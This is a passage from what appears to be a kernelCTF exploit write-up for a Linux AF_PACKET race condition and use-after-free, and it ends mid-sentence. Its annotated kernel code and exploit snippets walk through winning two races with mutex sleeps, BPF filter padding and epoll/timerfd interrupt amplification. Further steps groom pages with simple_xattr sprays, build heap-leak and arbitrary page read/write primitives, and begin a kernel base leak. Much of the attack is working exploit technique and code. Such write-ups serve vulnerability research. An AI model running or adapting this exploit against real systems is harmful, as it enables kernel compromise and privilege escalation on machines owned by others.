-ERESTARTSYS; + goto out_put; + } + } + continue; + } + + skb = NULL; + tp_len = tpacket_parse_header(po, ph, size_max, &data); // [6] + if (tp_len < 0) + goto tpacket_error; + + status = TP_STATUS_SEND_REQUEST; + hlen = LL_RESERVED_SPACE(dev); + tlen = dev->needed_tailroom; + + // ... + + copylen = max_t(int, copylen, dev->hard_header_len); + skb = sock_alloc_send_skb(&po->sk, // [7] + hlen + tlen + sizeof(struct sockaddr_ll) + + (copylen - dev->hard_header_len), + !need_wait, &err); + + // ... + tp_len = tpacket_fill_skb(po, skb, ph, dev, data, tp_len, proto, // [8] + addr, hlen, copylen, &sockc); + if (likely(tp_len >= 0) && + tp_len > dev->mtu + reserve && + !vnet_hdr_sz && + !packet_extra_vlan_len_allowed(dev, skb)) + tp_len = -EMSGSIZE; + + if (unlikely(tp_len < 0)) { // [9] +tpacket_error: + if (packet_sock_flag(po, PACKET_SOCK_TP_LOSS)) { // [10] + __packet_set_status(po, ph, + TP_STATUS_AVAILABLE); + packet_increment_head(&po->tx_ring); + kfree_skb(skb); + continue; // [11] + } else { + status = TP_STATUS_WRONG_FORMAT; + err = tp_len; + goto out_status; + } + } + + // ... + } while (likely((ph != NULL) || + (need_wait && packet_read_pending(&po->tx_ring)))); + + // ... +out: + mutex_unlock(&po->pg_vec_lock); // [12] + return err; +} +``` + +```c +/** + * wait_for_completion_interruptible_timeout: - waits for completion (w/(to,intr)) + * @x: holds the state of this particular completion + * @timeout: timeout value in jiffies + * + * This waits for either a completion of a specific task to be signaled or for a + * specified timeout to expire. It is interruptible. The timeout is in jiffies. + * + * Return: -ERESTARTSYS if interrupted, 0 if timed out, positive (at least 1, + * or number of jiffies left till timeout) if completed. + */ +long wait_for_completion_interruptible_timeout(struct completion *x, unsigned long timeout); +``` + +- [1] => we control `need_wait`. +- At [2], acquire the `po->pg_vec_lock` mutex +- At [3], the network interface we select must in UP state. +- At [4], we need `skb != NULL`. +- At [5], reach this code path will put the thread to sleep while holding the mutex. We control how long the thread will sleep. +- At [6], `tp_len` is read from our Tx ring buffer. +- After [7], `skb != NULL`. There's a code path inside `sock_alloc_send_skb()` that check `sk->sk_err` and will lead to `skb == NULL` if `sk->sk_err != 0`. I mention this because the packet socket we used here already bound to the network interface for the later bug triggering process. `sk->sk_err == ENETDOWN` in case the network interface is currently down (check `packet_notifier()` above). Therefore, while the bug triggering process require the network interface in down state, we still need to keep the network interface in `UP` state to further the progress in `tpacket_snd()`. +- At [8], we can force `tp_len < 0` to reach [9] and [10]. +- At [10], we can configure packet socket with `PACKET_SOCK_TP_LOSS` flag. +- At [11], loop second time and we reach [5]. Now, we achieved what we want. +- At [12], release `po->pg_vec_lock` mutex. + +Because this kernel code path will eventually lead to thread sleep, the exploit creates a thread named `pg_vec_lock_thread` to handle this process. `pg_vec_lock_thread` is configured to run on `CPU 0` , run with the lowest priority possible and implementation as boss-worker model. Main thread will send work to this thread when we want to hold `po->pg_vec_lock` mutex. By reading from `/proc/[tid]/stat` (`tid = gettid()`), we can check whether the thread is in sleep state to ensure the mutex is acquired as expected. After `pg_vec_lock_thread` thread is in sleep state, we can trigger `syscall(SYS_clock_gettime, CLOCK_MONOTONIC, &pg_vec_lock_acquire_time)` to get approximately time when the mutex is acquired. Because we also control how long the thread will sleep, we can calculate approximately the time when the mutex will release. + +Now, we need another thread named `pg_vec_buffer_thread`. This thread will be used to handle the process of trigger `packet_set_ring()` free path on the victim packet socket and then trigger `packet_set_ring()` on another packet socket to reclaim the freed ring buffer. This thread is configured to run on `CPU 0` (same CPU as `pg_vec_lock_thread`). + +At this point, the process to trigger first race condition look like: +1. Acquire `po->pg_vec_lock` mutex with `pg_vec_lock_thread`. +2. Put the network interface to `DOWN` state. +3. Trigger `packet_set_ring()` free path (described in `UAF` section above). +4. Verify `pg_vec_buffer_thread` is in sleep state after trying to acquire the mutex to ensure we already run pass the logic bug. +5. Put the network interface to `UP` state. +6. At this point, the first race condition is considered winning. We can begin to work on the second race condition. + +#### Step4 note: Because `pg_vec_buffer_thread` has higher priority than `pg_vec_lock_thread`, we hope that in the future that `pg_vec_lock` mutex is released, `packet_set_ring()` is allowed to continue the execution, the scheduler will decide to switch to `packet_set_ring()`. + +# Winning second race condition +We will use the packet socket created with `int trigger_sendmsg_packet_socket = socket(AF_PACKET, SOCK_PACKET, 0)` to send packet to the network interface. Call `sendmsg(trigger_sendmsg_packet_socket, ...)` will trigger kernel function `packet_sendmsg_spkt()`. + +```c +static int packet_sendmsg_spkt(struct socket *sock, struct msghdr *msg, + size_t len) +{ + struct sock *sk = sock->sk; + DECLARE_SOCKADDR(struct sockaddr_pkt *, saddr, msg->msg_name); + struct sk_buff *skb = NULL; + struct net_device *dev; + struct sockcm_cookie sockc; + __be16 proto = 0; + int err; + int extra_len = 0; + + + if (saddr) { + if (msg->msg_namelen < sizeof(struct sockaddr)) + return -EINVAL; + if (msg->msg_namelen == sizeof(struct sockaddr_pkt)) + proto = saddr->spkt_protocol; + } else + return -ENOTCONN; + + saddr->spkt_device[sizeof(saddr->spkt_device) - 1] = 0; +retry: + rcu_read_lock(); + dev = dev_get_by_name_rcu(sock_net(sk), saddr->spkt_device); // [1] + err = -ENODEV; + if (dev == NULL) + goto out_unlock; + + err = -ENETDOWN; + if (!(dev->flags & IFF_UP)) // [2] + goto out_unlock; + + // ... + + if (!skb) { + size_t reserved = LL_RESERVED_SPACE(dev); + int tlen = dev->needed_tailroom; + unsigned int hhlen = dev->header_ops ? dev->hard_header_len : 0; + + rcu_read_unlock(); + skb = sock_wmalloc(sk, len + reserved + tlen, 0, GFP_KERNEL); // [3] + if (skb == NULL) + return -ENOBUFS; + + skb_reserve(skb, reserved); + skb_reset_network_header(skb); + + if (hhlen) { + skb->data -= hhlen; + skb->tail -= hhlen; + if (len < hhlen) + skb_reset_network_header(skb); + } + err = memcpy_from_msg(skb_put(skb, len), msg, len); + if (err) + goto out_free; + goto retry; + } + + // ... + + dev_queue_xmit(skb); // [4] + // ... +} +``` +- [1]: we can choose with network interface to send the packet to. +- [2]: network interface must in `UP` state. +- [3]: create packet. +- [4]: send packet to the network interface. + +Call chain from `dev_queue_xmit()` to the hook function has two possibilities: + +First possibility: `packet_set_ring()` still not set hook function from `tpacket_rcv()` to `packet_rcv()` +```c +dev_queue_xmit + __dev_queue_xmit + dev_hard_start_xmit + xmit_one + dev_queue_xmit_nit + tpacket_rcv +``` + +Second possibility: `packet_set_ring()` set hook function from `tpacket_rcv()` to `packet_rcv()` +```c +dev_queue_xmit + __dev_queue_xmit + dev_hard_start_xmit + xmit_one + dev_queue_xmit_nit + packet_rcv +``` + +- Although there are other ways to send packet to network interface, I decided to go with `packet_sendmsg_spkt()` because it has much less code path to reach the hook function which is better for the race. +- The data to write shouldn't be big to avoid taking too much time for copy data to the packet. +- The exploit creates a thread named `tpacket_rcv_thread` to perform the `tpacket_rcv()` triggering process. This thread is configured to run on `CPU 1` which is difference CPU from `pg_vec_buffer_thread`. + +Assume we successfully trigger `tpacket_rcv()`, we want to slow down `tpacket_rcv()` as much as possible to give time for `packet_set_ring()` to free the ring buffer before `tpacket_rcv()` reach the point where `UAF` happen. + +Take a look at `tpacket_rcv()` again: + +```c +static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev, + struct packet_type *pt, struct net_device *orig_dev) +{ + struct sock *sk; + struct packet_sock *po; + struct sockaddr_ll *sll; + unsigned int snaplen, res; + + sk = pt->af_packet_priv; + po = pkt_sk(sk); + + // ... + snaplen = skb->len; // [1] + + res = run_filter(skb, sk, snaplen); // [2] + // ... + + if (snaplen > res) + snaplen = res; // [3] + + // ... +``` +```c +static unsigned int run_filter(struct sk_buff *skb, + const struct sock *sk, + unsigned int res) +{ + struct sk_filter *filter; + + rcu_read_lock(); + filter = rcu_dereference(sk->sk_filter); + if (filter != NULL) + res = bpf_prog_run_clear_cb(filter->prog, skb); + rcu_read_unlock(); + + return res; +} +``` + +- [1] : packet length +- [2] : run filter on the packet and return the packet length. The new length can be smaller than the original packet length. +- [3] : save new packet length. + +The exploit creates the filter with code look like: +```c +#define MAX_FILTER_LEN 700 +struct sock_filter filter[MAX_FILTER_LEN] = {}; +for (int i = 0; i < MAX_FILTER_LEN - 1; i++) { + filter[i].code = BPF_LD | BPF_IMM; + filter[i].k = 0xcafebabe; +} + +filter[MAX_FILTER_LEN - 1].code = BPF_RET | BPF_K; +filter[MAX_FILTER_LEN - 1].k = sizeof(size_t); +struct sock_fprog fprog = { .filter = config->filter, .len = MAX_FILTER_LEN }; +setsockopt(victim_packet_socket, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog)); +``` + +- By having a lot of filter code to perform the `BPF_LD | BPF_IMM` instruction, we can waste time loading `0xcafebabe` to the register 699 times. This helps us a little bit with the second race. +- `BPF_RET | BPF_K` instruction will return the value specified in `k`. This is the truncated size of the packet. Because we cannot send packet in any form we want, we can leverage this filter to truncate the packet length to the overflow size we want. As the example shown above, `k == sizeof(size_t)` means we want to overwrite a field with has size equal to `sizeof(size_t)`. + + +Because using the filter alone is not enough to win the second race, the exploit employs the timer interrupt technique from Jann Horn. The implementation of the technique look like the following code: +```c +#define N 100000 +int timerfd = timerfd_create(CLOCK_MONOTONIC, 0); +int epollfd = epoll_create1(0); +struct epoll_event epoll_events[N]; +epoll_events[0].data.fd = timerfd; +epoll_events[0].events = EPOLLIN; +epoll_ctl(epollfd, EPOLL_CTL_ADD, timerfd, &epoll_events[0]); + +for (int i = 0; i < N; i++) { + int dup_timerfd = dup(timerfd); + epoll_events[i].data.fd = dup_timerfd; + epoll_events[i].events = EPOLLIN; + epoll_ctl(epollfd, EPOLL_CTL_ADD, dup_timerfd, &epoll_events[i]); +} + +struct itimerspec settime_value = {}; +settime_value.it_value = timespec_add(pg_vec_lock_release_time, timer_interrupt_amplitude); +timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &settime_value, NULL); +``` + +The idea is we will try to raise the interrupt at the programmed time to interrupt the `tpacket_rcv()`. When the interrupt happened, `timerfd_tmrproc()` is triggered. + +```c +static enum hrtimer_restart timerfd_tmrproc(struct hrtimer *htmr) +{ + struct timerfd_ctx *ctx = container_of(htmr, struct timerfd_ctx, + t.tmr); + timerfd_triggered(ctx); + return HRTIMER_NORESTART; +} +``` + +```c +static void timerfd_triggered(struct timerfd_ctx *ctx) +{ + unsigned long flags; + + spin_lock_irqsave(&ctx->wqh.lock, flags); + ctx->expired = 1; + ctx->ticks++; + wake_up_locked_poll(&ctx->wqh, EPOLLIN); + spin_unlock_irqrestore(&ctx->wqh.lock, flags); +} +``` + +`wake_up_locked_poll()` -> `__wake_up_locked_key()` -> `__wake_up_common()` + +```c +static int __wake_up_common(struct wait_queue_head *wq_head, unsigned int mode, + int nr_exclusive, int wake_flags, void *key, + wait_queue_entry_t *bookmark) +{ + wait_queue_entry_t *curr, *next; + int cnt = 0; + + // ... + + list_for_each_entry_safe_from(curr, next, &wq_head->head, entry) { // [1] + unsigned flags = curr->flags; + int ret; + + if (flags & WQ_FLAG_BOOKMARK) + continue; + + ret = curr->func(curr, mode, wake_flags, key); + + // ... + } + + return nr_exclusive; +} +``` + +- [1] : each `epoll_ctl()` call from example code above will add one more entry to the list. By leverage the epoll, we can lengthen the list and make the interrupt handler took more time to finish. +- The entry is added to the list with function `ep_ptable_queue_proc()`. + +```c +static void ep_ptable_queue_proc(struct file *file, wait_queue_head_t *whead, + poll_table *pt) +{ + struct ep_pqueue *epq = container_of(pt, struct ep_pqueue, pt); + struct epitem *epi = epq->epi; + struct eppoll_entry *pwq; + + if (unlikely(!epi)) + return; + + pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL); + if (unlikely(!pwq)) { + epq->epi = NULL; + return; + } + + init_waitqueue_func_entry(&pwq->wait, ep_poll_callback); + pwq->whead = whead; + pwq->base = epi; + if (epi->event.events & EPOLLEXCLUSIVE) + add_wait_queue_exclusive(whead, &pwq->wait); + else + add_wait_queue(whead, &pwq->wait); // [1] + pwq->next = epi->pwqlist; + epi->pwqlist = pwq; +} +``` + +- [1] : where the entry is added. + +Although the technique is straightforward to use, using its on the KernelCTF environment need a little tweak. The problem is every file descriptor table can contain maximum 4096 file descriptors which is not enough to win the race. The exploit workaround the problem by first create a timerfd then create 180 threads that is named `timerfd_waitlist_thread`. Each thread performs the following things: +- Call `unshare(CLONE_FILES)` to create a private file descriptor table per thread. +- close() all file descriptor except the timerfd created before from main thread. +- Create epollfd. +- dup(timerfd) until the file descriptor table is full. +- Perform the `epoll_ctl()` with each timerfd like the code example above to lengthen the timerfd waitqueue list. + +At this point, the process to trigger second race condition look like: +- Have the victim packet socket setting up the filter beforehand. +- Calculate the time to raise the interrupt. Use the `pg_vec_lock_release_time` as starting point. +- Arm the timer with `timerfd_settime()`. Because we configured `tpacket_rcv_thread` to run on `CPU 1`, `timerfd_settime()` must be call on `CPU 1` to ensure the interrupt will run on `CPU 1` and hit the `tpacket_rcv()` as expected. +- Send work to `tpacket_rcv_thread`. Beside from the packet data, we also send the `pg_vec_lock_release_time` value and a `decrease_sleep_time` value. Using `nanosleep(pg_vec_lock_release_time - decrease_sleep_time)`, we want the `tpacket_rcv_thread` to sleep until the time nearly `pg_vec_lock_release_time`. If we let `tpacket_rcv_thread` send packet too early, we ensure `tpacket_rcv()` will trigger but `packet_set_ring()` thread still sleeping. If we let `tpacket_rcv_thread` send packet too late, the hook function is set to `packet_rcv()`. +- Main thread releases CPU and wait for all threads to finish the work. + +# pages_order2_read_primitive +### Prepare victim packet socket attributes: +1. `Tx ring buffer` : +```c +struct tpacket_req3 tx_ring = {}; +tx_ring.tp_block_size = PAGES_ORDER1_SIZE; +tx_ring.tp_block_nr = 1; +tx_ring.tp_frame_size = PAGES_ORDER1_SIZE; +tx_ring.tp_frame_nr = tx_ring.tp_block_size / tx_ring.tp_frame_size * tx_ring.tp_block_nr; +``` + +2. `Rx ring buffer`: +```c +struct tpacket_req3 rx_ring = {}; +rx_ring.tp_block_size = PAGES_ORDER3_SIZE; +rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16; +rx_ring.tp_frame_size = PAGES_ORDER3_SIZE; +rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr; +rx_ring.tp_sizeof_priv = 16248; +rx_ring.tp_retire_blk_tov = USHRT_MAX; +``` +3. `packet_reserve == 38` + +4. `socket filter`: +```c +struct sock_filter filter[MAX_FILTER_LEN] = {}; +for (int i = 0; i < MAX_FILTER_LEN - 1; i++) { + filter[i].code = BPF_LD | BPF_IMM; + filter[i].k = 0xcafebabe; +} + +filter[MAX_FILTER_LEN - 1].code = BPF_RET | BPF_K; +filter[MAX_FILTER_LEN - 1].k = sizeof(size_t); +``` + +5. `sndtimeo` : decide how long the `pg_vec_lock_thread` will sleep while holding the `pg_vec_lock` mutex. I chose one second. +6. `packet_version == TPACKET_V3`. + +### Prepare requests to spray `simple_xattr` kernel objects +```c +struct rb_node { + unsigned long __rb_parent_color; + struct rb_node *rb_right; + struct rb_node *rb_left; +} __attribute__((aligned(sizeof(long)))); + +struct simple_xattr { + struct rb_node rb_node; + char *name; + size_t size; + char value[]; +}; +``` +```c +// Example code to prepare requests +struct simple_xattr_request { + char filepath[PATH_MAX]; + char name[XATTR_NAME_MAX + 1]; + char *value; + size_t value_size; + bool allocated; +}; + +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH "/tmp/tmpfs/pages_order2_groom" +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_NAME_FMT "security.pages_order2_groom_%d" +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_FMT "pages_order2_groom_%d" +#define TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY 2048 + +for (int i = 0; i < TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY; i++) { + char value[XATTR_SIZE_MAX] = {}; + char name[XATTR_NAME_MAX + 1] = {}; + snprintf(name, sizeof(name), PAGES_ORDER2_GROOM_SIMPLE_XATTR_NAME_FMT, i); + snprintf(value, sizeof(value), PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_FMT, i); + simple_xattr_request = simple_xattr_request_create( + PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH, + name, + value, + KMALLOC_8K_SIZE // value_size + ); + + primitive->simple_xattr_requests[i] = simple_xattr_request; +} + +// sizeof(struct simple_xattr) == 40 and value_size == 8192 => `struct simple_xattr` object will be allocated from pages with `PAGES_ORDER2_SIZE`. +``` + +The primitive building process looks like: +1. Pin current execution to `CPU 0` (same CPU as `pg_vec_buffer_thread`). +2. Create 3 packet sockets: `drain_pages_order2_packet_socket`, `drain_pages_order3_packet_socket_1` and `drain_pages_order3_packet_socket_2`. +3. Use `drain_pages_order2_packet_socket` to allocate 1024 pages with `PAGES_ORDER2_SIZE`. +4. Use `drain_pages_order3_packet_socket_1` to allocate 1024 pages with `PAGES_ORDER3_SIZE`. +5. Use `drain_pages_order3_packet_socket_2` to allocate 512 pages with `PAGES_ORDER3_SIZE`. +6. Configure the victim packet socket. Rx ring buffer is allocated at this step. The expectation is buffers from Rx ring buffer will have higher address than the buffers allocated with `drain_pages_order3_packet_socket_1`. [(To satisfy condition mention above)](#assume-we-manage-to-page-groom-in-such-a-way-that-end-came-from-lower-address-and-curr-came-from-higher-address-we-can-avoid-code-path-at-1-and-we-enter-prb_retire_current_block) +7. Free all pages allocated from step 4. +8. Spray 2048 `struct simple_xattr` objects to reclaim freed pages from step 7. Although the allocation of `struct simple_xattr` object should be served from `PAGES_ORDER2_SIZE` freelist, Page allocator use Buddy Algorithm means in the situation where there is no page with `PAGES_ORDER2_SIZE` on the freelist, the kernel will took pages from `PAGES_ORDER3_SIZE` freelist and split into two half: first half used to serve the allocation and the other half is saved to `PAGES_ORDER2_SIZE` freelist. +9. Free some `struct simple_xattr` objects to leave slot for the reclamation ring buffer. The implementation look like: + +```c + for (int i = 512; i < ARRAY_SIZE(primitive->simple_xattr_requests); i += 128) { + Removexattr( + primitive->simple_xattr_requests[i]->filepath, + primitive->simple_xattr_requests[i]->name + ); + + primitive->simple_xattr_requests[i]->allocated = false; + } +``` +9. Trigger the page overflow process. The expected outcome is the exploit manage to overwrite the `size` member from one of the `struct simple_xattr` object with 65536. This is the maximum value allowed for a `struct simple_xattr` object. +10. Validate whether the overflow success with the implementation look like: + +```c +bool overflow_success = false; + +for (int i = 0; i < TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY && !overflow_success; i++) { + char value[KMALLOC_8K_SIZE] = {}; + + simple_xattr_request = primitive->simple_xattr_requests[i]; + if (!simple_xattr_request || !simple_xattr_request->allocated) + continue; + + ssize_t getxattr_ret = getxattr( + simple_xattr_request->filepath, + simple_xattr_request->name, + value, + KMALLOC_8K_SIZE + ); + + if (getxattr_ret < 0 && errno == ERANGE) { + primitive->overflowed_simple_xattr_request = simple_xattr_request; + primitive->simple_xattr_requests[i] = NULL; + overflow_success = true; + } + +} +``` + +- Originally, each `struct simple_xattr` object has `size == KMALLOC_8K_SIZE`. The overflowed one has `size == 65536`. Trying to call `getxattr(KMALLOC_8K_SIZE)` on the overflowed one will lead to error with `errno == ERANGE`. The exploit uses this behavior to detect the overflowed object. We will refer to this object as `overflowed_simple_xattr`. +- From now on, every time we trigger `getxattr(primitive->overflowed_simple_xattr_request->filepath, primitive->overflowed_simple_xattr_request->name, value, 65536)`, we got a heap leak. + +11. Leak heap and look for at least one recognize `struct simple_xattr` object. Let's call this object `leaked_content_simple_xattr`. If we don't find any `struct simple_xattr` object, we consider the process of building `pages_order2_read_primitive` is fail and we need to restart the process. +12. Destroy every allocated `struct simple_xattr` objects except `overflowed_simple_xattr` object and `leaked_content_simple_xattr` object. +13. Use `pages_order2_read_primitive` to leak heap again. Currently, the red black tree contain only two `struct simple_xattr` objects, so `leaked_content_simple_xattr` object contains kernel address of `overflowed_simple_xattr` object. We will refer to this kernel address as `overflowed_simple_xattr_kernel_address`. +14. Use the offset where we found `leaked_content_simple_xattr` and `overflowed_simple_xattr_kernel_address`, we can calculate kernel address of `leaked_content_simple_xattr` object. We will refer to this kernel address as `leaked_content_simple_xattr_kernel_address`. + +# simple_xattr_read_write_primitive +### Prepare packet sockets to allocate ring buffer + +```c +#define TOTAL_PAGES_ORDER2_PG_VEC_SPRAY 256 + +for (int i = 0; i < TOTAL_PAGES_ORDER2_PG_VEC_SPRAY; i++) + primitive->spray_pg_vec_packet_sockets[i] = Socket(AF_PACKET, SOCK_RAW, 0); +``` + +The primitive building process looks like: +1. Pin current execution to `CPU 0` (same CPU as `pg_vec_buffer_thread`). +2. Create 3 packet sockets: `drain_pages_order2_packet_socket`, `drain_pages_order3_packet_socket_1` and `drain_pages_order3_packet_socket_2`. +3. Use `drain_pages_order2_packet_socket` to allocate 256 pages with `PAGES_ORDER2_SIZE`. +4. Use `drain_pages_order3_packet_socket_1` to allocate 128 pages with `PAGES_ORDER3_SIZE`. +5. Use `drain_pages_order3_packet_socket_2` to allocate 128 pages with `PAGES_ORDER3_SIZE`. +6. Configure the victim packet socket with the config exactly the same as the config used in `pages_order2_read_primtive` building process. The expectation is buffers from Rx ring buffer will have higher address than the buffers allocated with `drain_pages_order3_packet_socket_1`. [(To satisfy condition mention above)](#assume-we-manage-to-page-groom-in-such-a-way-that-end-came-from-lower-address-and-curr-came-from-higher-address-we-can-avoid-code-path-at-1-and-we-enter-prb_retire_current_block) +7. Free all pages allocated from step 4. +8. Use the prepared packet socket to spray 256 ring buffer. Each ring buffer has the minimum buffers for the allocation to be served from `PAGES_ORDER2_SIZE` freelist and each buffer has `PAGES_ORDER0_SIZE` to avoid using too much memory. As we described the Buddy Algorithm above, the expectation is these ring buffer will eventually reuse the pages freed from step 7. +9. Free some ring buffer to leave slot for the reclamation ring buffer. The implementation looks like: +```c +for (int i = 64, free_count = 0; i < ARRAY_SIZE(primitive->spray_pg_vec_packet_sockets) && free_count < 6; i += 16, free_count++) { + free_pages(primitive->spray_pg_vec_packet_sockets[i]); + primitive->spray_pg_vec_packet_sockets_state[i] = 0; +} +``` +10. Trigger the page overflow process. The expected outcome is the exploit manage to overwrite one of ring buffer's buffer address with `leaked_content_simple_xattr_kernel_address`. +11. Validate whether the overflow success by mmaped each ring buffer and look for memory data look like `struct simple_xattr` object. We will refer to the packet socket with overflowed ring buffer as `overflowed_pg_vec_packet_socket`. + + +From now on, we can `mmap(overflowed_pg_vec_packet_socket)` and perform read/write on `leaked_content_simple_xattr` object. We will refer to the userspace memory that is currently used to manipulate `leaked_content_simple_xattr` object as `manipulated_simple_xattr`. + +# abr_page_read_write_primitive +We begin by destroy `overflowed_simple_xattr` object. Now, the red black tree contain only `leaked_content_simple_xattr` object. + +We need two `PAGES_ORDER2_SIZE` pages address: +- One to fake a `struct simple_xattr` object. We will refer to this object as `fake_simple_xattr` and this object's address as `fake_simple_xattr_addr`. +- One to fake `fake_simple_xattr->name`. We will refer to this object as `fake_simple_xattr_name` and this object's address as `fake_simple_xattr_name_addr`. + +#### The process of building `fake_simple_xattr_name` looks like: +1. Create a packet socket. We will refer to this packet socket as `fake_simple_xattr_name_packet_socket`. +2. Allocate a `struct simple_xattr` object with `setxattr(PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH, "security.leak_pages_order2_for_fake_simple_xattr_name", value, KMALLOC_8K_SIZE, XATTR_CREATE);`. We will refer to this object as `A`. `A` is allocated from `PAGES_ORDER2_SIZE` pages's freelist. `A` is on the same red black tree as `leaked_content_simple_xattr` object. +3. Use `manipulated_simple_xattr` to leak the address of `A`=> We have a `PAGES_ORDER2_SIZE` page address. Note: I chose to go with the lazy path by looking for pointer from `manipulated_simple_xattr->rb_node` instead of reading through kernel code to find out exactly the red black tree form. +4. Destroy `A`. +5. Use `fake_simple_xattr_name_packet_socket` to allocate a ring buffer with one buffer and the buffer has `PAGES_ORDER2_SIZE` to reclaim `A`. +6. `mmap()` ring buffer of `fake_simple_xattr_name_packet_socket` and write `"security.fake_simple_xattr_name"` to the buffer. Then, `munmap()` the buffer. +7. The process of validating whether we successfully reclaim `A` looks like: + - Set `manipulated_simple_xattr->name = fake_simple_xattr_name_addr`. + - `ssize_t ret = getxattr(PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH, "security.fake_simple_xattr_name", value, manipulated_simple_xattr->size)` + - If `ret == manipulated_simple_xattr->size`, we can confirm the reclamation success. +8. Set `manipulated_simple_xattr->name` back to the original value. +9. In case we confirmed reclamation is not success, we destroy the ring buffer and retry from step2. + +#### The process of building `fake_simple_xattr` looks like: +1. Create a packet socket. We will refer to this packet socket as `fake_simple_xattr_packet_socket`. +2. Allocate a `struct simple_xattr` object with `setxattr(PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH, "security.leak_pages_order2_for_fake_simple_xattr", value, KMALLOC_8K_SIZE, XATTR_CREATE);`. We will refer to this object as `B`. `B` is allocated from `PAGES_ORDER2_SIZE` pages's freelist. `B` is on the same red black tree as `leaked_content_simple_xattr` object. +3. Use `manipulated_simple_xattr` to leak the address of `B`=> We have a `PAGES_ORDER2_SIZE` page address. Keep track whether the leaked address coming from `rb_right` node or `rb_left` node. +4. Destroy `B`. +5. Use `fake_simple_xattr_packet_socket` to allocate a ring buffer with one buffer and the buffer has `PAGES_ORDER2_SIZE` to reclaim `B`. +6. `mmap()` ring buffer of `fake_simple_xattr_packet_socket` and write `"security.detect_fake_simple_xattr_reclaimation"` to the buffer. +7. The process of validating whether we successfully reclaim `B` looks like: + - Set `manipulated_simple_xattr->name = fake_simple_xattr_addr`. + - `ssize_t ret = getxattr(PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH, "security.detect_fake_simple_xattr_reclaimation", value, manipulated_simple_xattr->size)` + - If `ret == manipulated_simple_xattr->size`, we can confirm the reclamation success. +8. Set `manipulated_simple_xattr->name` back to the original value. +9. In case we confirmed reclamation is not success, we destroy the ring buffer and retry from step2. +10. `memset()` the mmaped ring buffer to all zeros. +11. Write a fake `struct simple_xattr` object to the mmaped ring buffer. The fake `struct simple_xattr` object looks like: +```c +struct simple_xattr *fake_simple_xattr = mem; +fake_simple_xattr->rb_node.__rb_parent_color = leaked_content_simple_xattr_kernel_address; +fake_simple_xattr->name = (char *)fake_simple_xattr_name_addr; +fake_simple_xattr->size = KMALLOC_8K_SIZE; +``` + +12. At step3, we keep track whether the node is right node or left node. Now, we can connect `fake_simple_xattr` to the red black tree by doing: +```c +if (is_right_node) { + manipulated_simple_xattr->rb_node.rb_right = (void *)fake_simple_xattr_addr; +} else { + manipulated_simple_xattr->rb_node.rb_left = (void *)fake_simple_xattr_addr; +} +``` + +#### The process of overlap ring buffer with buffer of ring buffer looks like: +1. Create a packet socket. We will refer to this packet socket as `overwritten_pg_vec_packet_socket`. +2. Trigger `removexattr(PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH, "security.fake_simple_xattr_name")`. Both `fake_simple_xattr_name_addr` and `fake_simple_xattr_addr` are freed. +3. Use `overwritten_pg_vec_packet_socket` to allocate a ring buffer with size such that the allocation will be served from `PAGES_ORDER_2` pages freelist. The expectation is the ring buffer will be allocated at either `fake_simple_xattr_name_addr` or `fake_simple_xattr_addr`. +4. `mmap()` both `fake_simple_xattr_name_packet_socket` and `fake_simple_xattr_packet_socket`. Look for data represent a ring buffer to confirm the overlapped (kernel address after kernel address). +5. Now, we have a `packet_socket_to_overwrite_pg_vec` and a `packet_socket_with_overwritten_pg_vec`. + +From now on, we can perform arbitrary page read/write with the implementation looks like: +```c +void *abr_page_read_write_primitive_mmap( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + u64 page_aligned_addr_to_mmap +) +{ + if (page_aligned_addr_to_mmap & (PAGE_SIZE - 1)) { + fprintf(stderr, "[abr_page_read_write_primitive_mmap]: page_aligned_addr_to_mmap is not page aligned\n"); + return NULL; + } + + void *mem = Mmap( + NULL, + abr_page_read_write_primitive->overwrite_pg_vec_mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + abr_page_read_write_primitive->packet_socket_to_overwrite_pg_vec, + 0 + ); + + struct pgv *pgv = mem; + pgv[0].buffer = (char *)page_aligned_addr_to_mmap; + Munmap(mem, abr_page_read_write_primitive->overwrite_pg_vec_mmap_size); + + mem = mmap( + NULL, + abr_page_read_write_primitive->overwritten_pg_vec_mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + abr_page_read_write_primitive->packet_socket_with_overwritten_pg_vec, + 0 + ); + + if (mem == MAP_FAILED) + return NULL; + + return mem; +} +``` + +# Find kernel base +The process of finding kernel base looks like: +1. Create pipe. +2. Allocate a `struct simple_xattr` object with `setxattr(PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH, "security.leaked_pages_order2_addr_for_pipe_buffer", value, KMALLOC_8K_SIZE, XATTR_CREATE);`. We will refer to this object as `C`. `C` is allocated from `PAGES_ORDER2_SIZE` pages's freelist. `C` is on the same red black tree as `leaked_content_simple_xattr` object. +3. Use `manipulated_simple_xattr` to leak the address of `C`=> We have a `PAGES_ORDER2_SIZE` page address. We will refer to this address as `pipe_buffer_addr`. +4. Destroy `C`. +5. Call `fcntl(pipe_fd[0], F_SETPIPE_SZ, PAGE_COUNT_TO_ALLOCATE_PIPE_BUFFER_ON_PAGES_ORDER2 * PAGE_SIZE)`. This will eventually trigger the allocation of `struct pipe_buffer` object on `PAGES_ORDER2_SIZE` pages's freelist. +6. Write data to pipe to populate `struct pipe_buffer` object with useful stuffs. +7. Use `abr_page_read_write_primitive` to read `pipe_buffer_addr` and in case the data look like `struct 